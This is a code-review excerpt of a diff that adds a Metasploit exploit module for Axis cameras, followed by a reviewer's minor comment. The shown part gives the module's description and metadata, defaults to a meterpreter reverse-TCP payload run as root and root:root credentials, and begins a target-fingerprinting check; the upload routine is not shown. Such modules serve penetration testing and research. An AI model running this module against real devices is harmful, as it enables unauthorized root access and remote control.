modules/exploits/linux/http/axis_app_install.rb

```diff
@@ -0,0 +1,254 @@
+          arbitrary code. The issue has no CVE, although the technique was made public in 2018.
+
+          This module uploads and executes stageless meterpreter as `root`. Uploading the application
+          requires valid credentials. The default administrator credentials used to be `root:root` but
+          newer firmware versions force users to provide a new password for the `root` user.
+
+          The module was tested on an Axis M3044-V using the latest firmware (9.80.3.8: December 2021).
+          Although all modules that support this feature are presumed to be vulnerable.
+        },
+        'License' => MSF_LICENSE,
+        'Author' => [
+          'jbaines-r7' # Discovery and Metasploit module
+        ],
+        'References' => [
+          [ 'URL', 'https://www.tenable.com/blog/tenable-research-advisory-axis-camera-app-malicious-package-distribution-weakness'],
+          [ 'URL', 'https://www.axis.com/support/developer-support/axis-camera-application-platform']
+        ],
+        'DisclosureDate' => '2018-04-12',
+        'Platform' => ['linux'],
+        'Arch' => [ARCH_ARMLE],
+        'Privileged' => false,
+        'Targets' => [
+          [
+            'Linux Dropper',
+            {
+              'Platform' => 'linux',
+              'Arch' => [ARCH_ARMLE],
+              'Type' => :linux_dropper,
+              'Payload' => {
+              },
+              'DefaultOptions' => {
+                'PAYLOAD' => 'linux/armle/meterpreter_reverse_tcp'
+              }
+            }
+          ]
+        ],
+        'DefaultTarget' => 0,
+        'DefaultOptions' => {
+          'RPORT' => 80,
+          'SSL' => false
+        },
+        'Notes' => {
+          'Stability' => [CRASH_SAFE],
+          'Reliability' => [REPEATABLE_SESSION],
+          'SideEffects' => [IOC_IN_LOGS, ARTIFACTS_ON_DISK]
+        }
+      )
+    )
+    register_options([
+      OptString.new('TARGETURI', [true, 'Base path', '/']),
+      OptString.new('USERNAME', [true, 'The username to authenticate with', 'root']),
+      OptString.new('PASSWORD', [true, 'The password to authenticate with', 'root'])
+    ])
+  end
+
+  # Check function will attempt to verify:
+  #
+  # 1. The provided credentials work for authentication
+  # 2. The remote target is an axis camera
+  # 3. The applications API exists.
+  #
+  def check
+    # grab the brand/model. Shouldn't require authentication.
+    res = send_request_cgi({
+      'method' => 'GET',
+      'uri' => normalize_uri(target_uri.path, '/axis-cgi/prod_brand_info/getbrand.cgi')
+    })
+
+    return CheckCode::Unknown unless res && (res.code == 200)
+
+    body_json = res.get_json_document
+    return CheckCode::Unknown if body_json.empty? || body_json.dig('Brand', 'Brand').nil?
+
+    # The brand / model are now known
+    check_comment = "The target reports itself to be a '#{body_json.dig('Brand', 'Brand')} #{body_json.dig('Brand', 'ProdNbr')}'"
```

Comment:
Minor comment but `ProdShortName` field contains this info already combined. Might help reduce some combination efforts.